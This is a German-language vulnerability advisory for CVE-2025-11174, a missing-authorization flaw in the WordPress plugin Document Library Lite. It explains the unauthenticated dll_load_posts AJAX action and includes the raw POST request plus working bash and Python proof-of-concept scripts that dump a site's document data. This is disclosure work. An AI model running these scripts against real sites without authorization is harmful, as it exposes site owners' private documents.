
Document Library Lite <= 1.1.6 – Fehlende Autorisierung zur Offenlegung sensibler Informationen | CVE-2025-11174
Keywords: CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025
Sicherheitslücke zur Offenlegung von Informationen im WordPress-Plugin Document Library Lite (CVE-2025-11174) – Ein Sicherheitsfehler, der nicht authentifizierten Zugriff auf sensible Dokumentdaten im Document-Library-Plugin von WordPress ermöglicht.
Es wurde eine kritische Schwachstelle in der Autorisierungsumgehung im WordPress-Plugin Document Library Lite entdeckt, die es nicht authentifizierten Angreifern erlaubt, auf sensible Dokumentinformationen zuzugreifen, ohne ordnungsgemäße Authentifizierung.
Entdeckt von: Kai Aizen & Avraham Shemesh (SnailSploit)
Veröffentlicht: 1. November 2025
CVSS-Score: 5.3 (Mittel)
CWE: CWE-862 – Fehlende Autorisierung
Plugin: Document Library Lite
Anbieter: Barn2 Plugins
Angriffstyp: Nicht authentifizierte Offenlegung von Informationen
Erforderliche Berechtigungen: Keine (nicht authentifizierter Angriff)
Das Plugin Document Library Lite für WordPress enthält eine Schwachstelle durch fehlerhafte Autorisierung in allen Versionen bis einschließlich 1.1.6. Das Plugin legt eine nicht authentifizierte AJAX-Aktion dll_load_posts offen, die eine JSON-Tabelle mit Dokumentdaten zurückgibt, ohne Nonce- oder Berechtigungsprüfungen durchzuführen.
Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern:
Hinweis: Der CVSS-Score von 5.3 (mittlerer Schweregrad) spiegelt eine begrenzte Offenlegung von Informationen wider. Während die Schwachstelle nicht authentifizierten Zugriff auf Dokumentdaten erlaubt, wird die Auswirkung auf die Vertraulichkeit als Niedrig eingestuft, ohne Auswirkungen auf Integrität oder Verfügbarkeit.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
| Metrik | Wert |
|---|---|
| Angriffsvektor | Netzwerk (AV:N) |
| Angriffskomplexität | Niedrig (AC:L) |
| Erforderliche Berechtigungen | Keine (PR:N) |
| Benutzerinteraktion | Keine (UI:N) |
| Auswirkungsbereich | Unverändert (S:U) |
| Vertraulichkeit | Niedrig (C:L) |
| Integrität | Keine (I:N) |
| Verfügbarkeit | Keine (A:N) |
CVSS v3.1 Aufschlüsselung:
Die AJAX-Aktion dll_load_posts ist ohne ordnungsgemäße Authentifizierungs- oder Autorisierungsprüfungen registriert:
// Verwundbares Code-Muster (vereinfacht)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
Das Präfix wp_ajax_nopriv_ zeigt an, dass diese Aktion für nicht authentifizierte Benutzer zugänglich ist, und die Callback-Funktion implementiert keine:
POST /wp-admin/admin-ajax.php
action=dll_load_posts
Die Schwachstelle kann über den WordPress-Endpunkt admin-ajax.php ohne Authentifizierung ausgenutzt werden.
⚠️ Nur für Bildungszwecke und autorisierte Tests
#!/bin/bash
# CVE-2025-11174 PoC
TARGET_URL="$1"
if [ -z "$TARGET_URL" ]; then
echo "Usage: $0 <target_url>"
echo "Example: $0 https://example.com"
exit 1
fi
echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""
# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=dll_load_posts" \
| python3 -m json.tool
echo ""
echo "[+] If you see document data above, the site is vulnerable!"
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""
import requests
import sys
import json
def exploit(target_url):
ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
print(f"[*] Target: {target_url}")
print(f"[*] AJAX Endpoint: {ajax_url}\n")
data = {'action': 'dll_load_posts'}
try:
response = requests.post(ajax_url, data=data, timeout=10)
if response.status_code == 200:
print("[+] Request successful!\n")
try:
json_data = response.json()
print("[+] Retrieved document data:")
print(json.dumps(json_data, indent=2))
print("\n[!] Site is VULNERABLE to CVE-2025-11174")
except json.JSONDecodeError:
print("[-] No JSON response received")
print(f"Response: {response.text[:200]}")
else:
print(f"[-] Request failed with status code: {response.status_code}")
except requests.RequestException as e:
print(f"[-] Error: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <target_url>")
print(f"Example: {sys.argv[0]} https://example.com")
sys.exit(1)
target = sys.argv[1]
exploit(target)
Sofortmaßnahme erforderlich:
admin-ajax.php mit action=dll_load_posts